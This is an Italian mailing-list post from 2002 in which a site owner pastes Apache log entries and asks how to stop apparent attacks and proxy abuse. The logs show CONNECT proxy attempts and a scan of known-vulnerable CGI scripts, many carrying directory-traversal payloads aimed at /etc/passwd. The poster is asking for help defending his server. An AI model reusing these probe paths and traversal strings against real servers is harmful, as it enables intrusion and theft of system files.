[Tech] Redirezioni? Attacchi al sistema?

Roberto Del Bianco delbia@tin.it
Mer 15 Maggio 2002 17:50:48 CEST 

Salve a tutti! Leggo (qualche volta) ma non intervengo mai... però oggi
sì :-)

Volevo esporvi un quesito: nel log Apache del mio sito personale (a
proposito lo avete visitato?) noto a volte degli strani arrivi, come se
attraverso il mio server qualcuno cercasse di connettersi altrove.

Arrivano ad esempio cose tipo:

212.171.48.247  - - [04/Mar/2002:11:00:32 +0100] "CONNECT
207.46.133.140:21 HTTP/1.0" 200 14803
62.211.229.29  - - [06/Mar/2002:20:31:53 +0100] "CONNECT
irc2.tin.it:6667 HTTP/1.0" 200 19191
195.130.233.45  - - [12/Mar/2002:21:24:27 +0100] "CONNECT
195.130.233.45:6667 HTTP/1.0" 200 18899

o anche:

211.35.206.221  - - [14/May/2002:21:46:31 +0200] "HEAD
http://member.asiasex.com/ HTTP/1.0" 200 0

come pure:

213.45.117.35  - - [26/Apr/2002:12:59:36 +0200] "HEAD ///carbo.ddl
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:36 +0200] "HEAD /cgi-bin/count.cgi
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:37 +0200] "HEAD
/cgi-bin/cgforum.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:38 +0200] "HEAD /cgi-bin/faxsurvey
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:39 +0200] "HEAD /cgi-bin/gbook.cgi
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:39 +0200] "HEAD /cgi-bin/htsearch
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:40 +0200] "HEAD
/cgi-bin/htmlscript HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:41 +0200] "HEAD /cgi-bin/jj
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:42 +0200] "HEAD /technote/
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:42 +0200] "HEAD
/cgi-bin/mmstdod.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:44 +0200] "HEAD /cgi-bin/newdesk
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:44 +0200] "HEAD
/cgi-bin/register.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:45 +0200] "HEAD
/cgi-bin/simplestguest.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:46 +0200] "HEAD
/cgi-bin/statusconfig.pl HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:46 +0200] "HEAD /cgi-bin/webgais
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:47 +0200] "HEAD /iisadmpwd/
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:48 +0200] "HEAD /cgi-bin/webgais
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:49 +0200] "HEAD /cgi-dos/
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:50 +0200] "HEAD /scripts/
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:50 +0200] "HEAD
/cgi-bin/infosrch.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:52 +0200] "HEAD /mall_log_files/
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:52 +0200] "HEAD
/cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:53 +0200] "HEAD /Admin_files/
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:54 +0200] "GET ///quote.html
HTTP/1.0" 404 281
213.45.117.35  - - [26/Apr/2002:12:59:54 +0200] "GET
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00
HTTP/1.0" 404 288
213.45.117.35  - - [26/Apr/2002:12:59:55 +0200] "HEAD
/cgi-bin/dcboard.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:56 +0200] "GET
/cgi-bin/nph-maillist.pl HTTP/1.0" 404 292
213.45.117.35  - - [26/Apr/2002:12:59:56 +0200] "GET
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
HTTP/1.0" 404 289
213.45.117.35  - - [26/Apr/2002:12:59:57 +0200] "GET
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
HTTP/1.0" 404 292
213.45.117.35  - - [26/Apr/2002:12:59:58 +0200] "HEAD
/cgi-bin/ikonboard/ HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:12:59:58 +0200] "HEAD /foldoc/ HTTP/1.0"
404 0
213.45.117.35  - - [26/Apr/2002:12:59:59 +0200] "HEAD /cgi-bin/adcycle/
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:00 +0200] "GET
/cgi-bin/store.cgi?StartID=../etc/passwd%00.html HTTP/1.0" 404 286
213.45.117.35  - - [26/Apr/2002:13:00:01 +0200] "HEAD
/cgi-bin/bbs_forum.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:02 +0200] "HEAD
/cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html  HTTP/1.0"
404 0
200 25084
213.45.117.35  - - [26/Apr/2002:13:00:03 +0200] "GET
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd
HTTP/1.0" 404 287
213.45.117.35  - - [26/Apr/2002:13:00:05 +0200] "GET
/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0" 404 284
213.45.117.35  - - [26/Apr/2002:13:00:08 +0200] "HEAD
/cgi-bin/mailnews.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:11 +0200] "HEAD
/cgi-bin/newsdesk.cgi HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:12 +0200] "HEAD /cgi-bin/pals-cgi
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:14 +0200] "HEAD /ROADS/ HTTP/1.0"
404 0
213.45.117.35  - - [26/Apr/2002:13:00:15 +0200] "GET
/cgi-bin/sendtemp.pl?templ=../../etc/passwd HTTP/1.0" 404 288
213.45.117.35  - - [26/Apr/2002:13:00:15 +0200] "HEAD /way-board/
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:16 +0200] "GET
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0"
404 289
213.45.117.35  - - [26/Apr/2002:13:00:17 +0200] "HEAD
/cgi-bin/DCShop/Orders/orders.txt HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:17 +0200] "HEAD
/cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:18 +0200] "HEAD /cgi-bin/a1stats/
HTTP/1.0" 404 0
213.45.117.35  - - [26/Apr/2002:13:00:19 +0200] "GET
/cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd
HTTP/1.0" 404 288
213.45.117.35  - - [26/Apr/2002:13:00:22 +0200] "GET
/cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0"
404 286

che mi sembra quasi un tentativo di attacco (perdonate la mia poca
pratica in questo genere di cose) anche se ovviamente non esistendo
questi file nel sito Linux, il server risponde con 404.

Soprattutto per chi pensasse di usare il mio sito come "trampolino" per
qualche suo scopo, ci sono mezzi (ad esempio, nella configurazione di
Apache) tali da bloccare simili iniziative? Dal punto di vista del
sistema dovrei essere abbastanza protetto (uso "iridium" che è uno
script corposo utilizzante ipchains, e che credo di acere configurato
bene).


Attendo news! :-)
-----------------------------------------------------------------------------------------

Roberto Del Bianco - ICQ 68931976, robi55 in IRC.
My Home Site: http://www.casamia.2y.net
Visit also: http://www.peacelink.it, the best Italian site for Pacifism
and Human Rights.

Maggiori informazioni sulla lista flug-tech